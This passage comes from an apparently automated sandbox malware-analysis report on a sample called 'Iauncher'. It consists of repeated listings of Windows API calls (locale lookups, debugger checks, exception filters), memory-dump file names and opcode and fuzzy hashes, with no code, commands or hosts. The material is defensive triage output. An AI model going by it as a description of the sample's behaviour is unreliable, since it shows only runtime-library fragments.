                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00F217C6,?,?,?,00000055,?,-00000050,?,?), ref: 00F2C2AE
                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00F2C411
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                              • String ID: utf8
                                                                                                                                                                              • API String ID: 607553120-905460609
                                                                                                                                                                              • Opcode ID: 40df8e4729c5f21c867b480dc4cfdafcd52849df5e23ca071dfa32c8e55320f3
                                                                                                                                                                              • Instruction ID: e7af0813cdb92f6098dd599ef173b2d3be7514b6297c421260be90a8be8c0734
                                                                                                                                                                              • Opcode Fuzzy Hash: 40df8e4729c5f21c867b480dc4cfdafcd52849df5e23ca071dfa32c8e55320f3
                                                                                                                                                                              • Instruction Fuzzy Hash: F171E871A04325AADB24EB74EC46BAE73A8AF44760F144429F905DB181EA78ED40E7E1
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _strrchr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3213747228-0
                                                                                                                                                                              • Opcode ID: 45bf08c2e22f38f603408032c61045bde22d04295a5d25251943078c29725431
                                                                                                                                                                              • Instruction ID: aa17a2576a1e19ed9ef934f66a5cd0988b36b14778257547630353f499cdb4dd
                                                                                                                                                                              • Opcode Fuzzy Hash: 45bf08c2e22f38f603408032c61045bde22d04295a5d25251943078c29725431
                                                                                                                                                                              • Instruction Fuzzy Hash: 1AB17C32D002A59FDB15CF68D8817FEBFE5EF55310F14816AE815AB241D2B8AD41EBA0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00F16DAB
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00F16E77
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F16E90
                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00F16E9A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 254469556-0
                                                                                                                                                                              • Opcode ID: cbf010093b1cc77e6e0bf52314c4cbbe0b362754dd017fd1ceddd654277f2e9f
                                                                                                                                                                              • Instruction ID: 2e95407157798d846d1d02aa10197dc23d4c70f3a3327a15ef9491a178fed069
                                                                                                                                                                              • Opcode Fuzzy Hash: cbf010093b1cc77e6e0bf52314c4cbbe0b362754dd017fd1ceddd654277f2e9f
                                                                                                                                                                              • Instruction Fuzzy Hash: EC31F6B5D052189BDF20DFA4DD897CDBBB8AF08350F1041AAE50CAB250EB74AA859F45
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00F230E0: GetLastError.KERNEL32(?,00000008,00F28F07,00000000,00F1AC50), ref: 00F230E4
                                                                                                                                                                                • Part of subcall function 00F230E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00F23186
                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F2C629
                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F2C673
                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F2C739
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoLocale$ErrorLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 661929714-0
                                                                                                                                                                              • Opcode ID: 65e0a908a09a7a0302353338b56a6104fe60b95a940a383a11c01606762fa743
                                                                                                                                                                              • Instruction ID: 86291a5ea5b65a00ef50b0a14a1422b7f0e913f114986a983f21ab0ee98582a1
                                                                                                                                                                              • Opcode Fuzzy Hash: 65e0a908a09a7a0302353338b56a6104fe60b95a940a383a11c01606762fa743
                                                                                                                                                                              • Instruction Fuzzy Hash: BF6171719105279BEB28DF28EC82BAE77A8EF04720F108179ED05D6581E778D945EF90
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00F1ABCB
                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F1ABD5
                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00F1ABE2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                              • Opcode ID: e7bdb18b4537b4dafad8a28d0ae7e2956398dd9bf7f8736ba04254e34bffde90
                                                                                                                                                                              • Instruction ID: d4781a8ef87efb928099d655f38a2fc2ae94e52604a1c7f6a2201bc1baa1e098
                                                                                                                                                                              • Opcode Fuzzy Hash: e7bdb18b4537b4dafad8a28d0ae7e2956398dd9bf7f8736ba04254e34bffde90
                                                                                                                                                                              • Instruction Fuzzy Hash: 3031B37590122C9BCB25DF64DD89BCCBBB8AF08310F5041DAE41CA6290EB749FC59F55
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F16892
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2325560087-0
                                                                                                                                                                              • Opcode ID: 46621f2684ba947e8da6f3c3dcb08199b890d0a1dfbc4d3af1e96631e37a5e15
                                                                                                                                                                              • Instruction ID: 3a26f6b65029213e5b042e4887e35b491c9dc652d7a673aa32c12a725cd9c440
                                                                                                                                                                              • Opcode Fuzzy Hash: 46621f2684ba947e8da6f3c3dcb08199b890d0a1dfbc4d3af1e96631e37a5e15
                                                                                                                                                                              • Instruction Fuzzy Hash: 73518FB1E01209CFEB18CF65D9817AEBBF1FB54320F24852AD445EB261D374D984DB50
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 684deb9c2f2574f7d91505283bdd3d6d83984e60233b04a04928df00cd44d00c
                                                                                                                                                                              • Instruction ID: d4de0ed5977d196996e08851e2c6f25d86912eb60da4c2a2451f938fd44ce552
                                                                                                                                                                              • Opcode Fuzzy Hash: 684deb9c2f2574f7d91505283bdd3d6d83984e60233b04a04928df00cd44d00c
                                                                                                                                                                              • Instruction Fuzzy Hash: 9F41B2B5C08228AEDB20DF69DC89AEABBB8AF45310F1442D9E418D3201DA759E849F50
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00F230E0: GetLastError.KERNEL32(?,00000008,00F28F07,00000000,00F1AC50), ref: 00F230E4
                                                                                                                                                                                • Part of subcall function 00F230E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00F23186
                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F2C87C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                              • Opcode ID: 624afa406101bf169ec8db506a9745e6e8385c41c36f36934d6b02d37f76bd0e
                                                                                                                                                                              • Instruction ID: 914c89bb2932182bff89b4ed1c96be3e8cf0b41e1250ad1a78b6bdf6cddcbdae
                                                                                                                                                                              • Opcode Fuzzy Hash: 624afa406101bf169ec8db506a9745e6e8385c41c36f36934d6b02d37f76bd0e
                                                                                                                                                                              • Instruction Fuzzy Hash: 30216872A152269BDB28DA25EC41FBE73A8EF44314F10807AFD01D7141EB79ED44AB91
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00F230E0: GetLastError.KERNEL32(?,00000008,00F28F07,00000000,00F1AC50), ref: 00F230E4
                                                                                                                                                                                • Part of subcall function 00F230E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00F23186
                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00F2C5D5,00000001,00000000,?,-00000050,?,00F2CC06,00000000,?,?,?,00000055,?), ref: 00F2C521
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                              • Opcode ID: e8814ce3dc645dfeee6b717c5f6e456ae7406451cddea70dfbe70e5d74c6f6b4
                                                                                                                                                                              • Instruction ID: 19517a8bc6ad5b2e9b0b56bc5cbf89b10999c57ef9a3269360dea4ed73cdbe36
                                                                                                                                                                              • Opcode Fuzzy Hash: e8814ce3dc645dfeee6b717c5f6e456ae7406451cddea70dfbe70e5d74c6f6b4
                                                                                                                                                                              • Instruction Fuzzy Hash: 48118C376003005FDB18AF39D8A167EB791FF80368B08442DE94687600D771F902D780
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00F230E0: GetLastError.KERNEL32(?,00000008,00F28F07,00000000,00F1AC50), ref: 00F230E4
                                                                                                                                                                                • Part of subcall function 00F230E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00F23186
                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00F2C7F1,00000000,00000000,?), ref: 00F2CA83
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                              • Opcode ID: 1658d02c0e1546185c3e00695c321732a40682d0aa761484fd73c0b5e0def142
                                                                                                                                                                              • Instruction ID: e85646166a2e854df3ec4e6210be4583ec771d56af850913fe8c521d9f1e470b
                                                                                                                                                                              • Opcode Fuzzy Hash: 1658d02c0e1546185c3e00695c321732a40682d0aa761484fd73c0b5e0def142
                                                                                                                                                                              • Instruction Fuzzy Hash: 9BF0F936A0013AAFDB28D621DC26BBE7754EB40764F084425ED06A3140DA79FE41EAD0
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00F230E0: GetLastError.KERNEL32(?,00000008,00F28F07,00000000,00F1AC50), ref: 00F230E4
                                                                                                                                                                                • Part of subcall function 00F230E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00F23186
                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00F2C828,00000001,?,?,-00000050,?,00F2CBCA,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00F2C594
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                              • Opcode ID: 69d9d99d5bf56a7b49732af6c5a7e9a2d181386f2e3de7e211da7e1cacb22b54
                                                                                                                                                                              • Instruction ID: 3f5c8409bc4545e31caeee48f56614dffe87387c7ec5a6384a600b8ce102004e
                                                                                                                                                                              • Opcode Fuzzy Hash: 69d9d99d5bf56a7b49732af6c5a7e9a2d181386f2e3de7e211da7e1cacb22b54
                                                                                                                                                                              • Instruction Fuzzy Hash: B3F0C2367003145FDB149F35AC82A7E7B91EF81768B19842CF9464B690C676ED41EB90
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00F1D9E4: EnterCriticalSection.KERNEL32(?,?,00F22DB8,?,00F3D418,00000008,00F22F7C,?,?,?), ref: 00F1D9F3
                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00F257E6,00000001,00F3D4D8,0000000C,00F25C15,00000000), ref: 00F2582B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                              • Opcode ID: e25d2eecd2a1724a9b06269e04b16652102cf7c5f65a0836d418958e6a3e7934
                                                                                                                                                                              • Instruction ID: 9daeecf3a68bc5611fb163ce034c3772594ac71c85558df67da3604ae219b036
                                                                                                                                                                              • Opcode Fuzzy Hash: e25d2eecd2a1724a9b06269e04b16652102cf7c5f65a0836d418958e6a3e7934
                                                                                                                                                                              • Instruction Fuzzy Hash: 4BF03772A50218DFD700EF98E882B9877B1FB08774F00412AE8109B2A1CBB99945EF51
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00F230E0: GetLastError.KERNEL32(?,00000008,00F28F07,00000000,00F1AC50), ref: 00F230E4
                                                                                                                                                                                • Part of subcall function 00F230E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00F23186
                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00F2C3BD,00000001,?,?,?,00F2CC28,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F2C49B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                              • Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                              • Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
